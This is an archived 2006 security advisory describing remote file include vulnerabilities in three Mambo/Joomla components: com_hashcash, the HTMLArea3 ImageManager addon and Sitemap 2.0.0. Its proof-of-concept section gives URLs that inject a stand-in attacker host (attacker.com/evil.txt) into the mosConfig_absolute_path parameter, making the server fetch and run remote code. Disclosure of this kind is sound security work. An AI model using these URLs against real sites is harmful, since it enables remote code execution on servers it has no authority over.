Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-3575.htm

Mambo/joomla component remote file include vulnerabilities



Multiple Mambo/Joomla Component Remote File Include Vulnerabilities
Multiple Mambo/Joomla Component Remote File Include Vulnerabilities



ECHO_ADV_38$2006=0D
=0D
-----------------------------------------------------------------------------------------------=0D
=0D
[ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities=0D
-----------------------------------------------------------------------------------------------=0D
=0D
 =0D
Author          : Ahmad Maulana a.k.a Matdhule=0D
Date            : July 12th 2006=0D
Location        : Indonesia, Jakarta=0D
Web : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt=0D 
Critical Lvl    : Highly critical=0D
Impact          : System access=0D
Where           : From Remote=0D
------------------------------------------------------------------------=0D
=0D
 =0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
# Hashcash Component=0D
=0D
Application     : com_hashcash Component=0D
version         : 1.2.1=0D
URL : http://developer.joomla.org/sf/frs/do/viewRelease/projects.com_hashcash/frs.components.com_hashcash=0D 
=0D
# HTMLArea3 addon - ImageManager=0D
=0D
Application     : HTMLArea3 addon - ImageManager=0D
Version         : 1.5=0D
URL             : =0D
=0D
# Sitemap 2.0.0 for Mambo 4.5.1 CMS=0D
=0D
Application     : Sitemap 2.0.0 for Mambo 4.5.1 CMS=0D
Version         : Sitemap 2.0.0=0D
URL : http://mamboxchange.com/frs/download.php/6463/sitemap20.zip=0D 
=0D
------------------------------------------------------------------------=0D
=0D
 =0D
Vulnerability:=0D
~~~~~~~~~~~~~~=0D
 =0D
# Hashcash Component=0D
=0D
In folder com_hashcash we found vulnerability script server.php.=0D
=0D
-----------------------server.php---------------------------------------=0D
http://www.gnu.org/copyleft/gpl.html=0D 
* @version $Revision: 1.5 $=0D
**/=0D
=0D
require($mosConfig_absolute_path."/administrator/components/com_htmlarea3_xtd-c/config.htmlarea3_xtd-c.php");=0D
=0D
------------------------------------------------------------------------=0D
=0D
# Sitemap 2.0.0 for Mambo 4.5.1 CMS=0D
=0D
In folder com_sitemap we found vulnerability script sitemap.xml.php.=0D
=0D
-----------------------sitemap.xml.php----------------------=0D
http://www.gnu.org/copyleft/gpl.html GNU/GPL=0D 
* Mambo is Free Software=0D
* Author : Johan Janssens - johan@jinx.be (http://www.jinx.be)=0D 
**/=0D
=0D
// XML library=0D
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );=0D
=0D
------------------------------------------------------------=0D
=0D
Variables $mosConfig_absolute_path are not properly sanitized. When=0D
register_globals=on=0D
and allow_fopenurl=on an attacker can exploit this vulnerability with a=0D
simple php injection script.=0D
 =0D
Proof Of Concept:=0D
~~~~~~~~~~~~~~~=0D
 =0D
http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolute_path=http://attacker.com/evil.txt?=0D 
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript=0D 
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt? =0D 
=0D
Solution:=0D
~~~~~~~=0D
 =0D
sanitize variabel $mosConfig_absolute_path.=0D
 =0D
 =0D
------------------------------------------------------------------------=0D
---=0D
Shoutz:=0D
~~~~~=0D
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)=0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous=0D
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama=0D
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com=0D 
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net=0D 
------------------------------------------------------------------------=0D
---=0D
Contact:=0D
~~~~~~=0D
 =0D
     matdhule[at]gmail[dot]com=0D
     =0D
-------------------------------- [ EOF ]----------------------------------=0D
 =0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH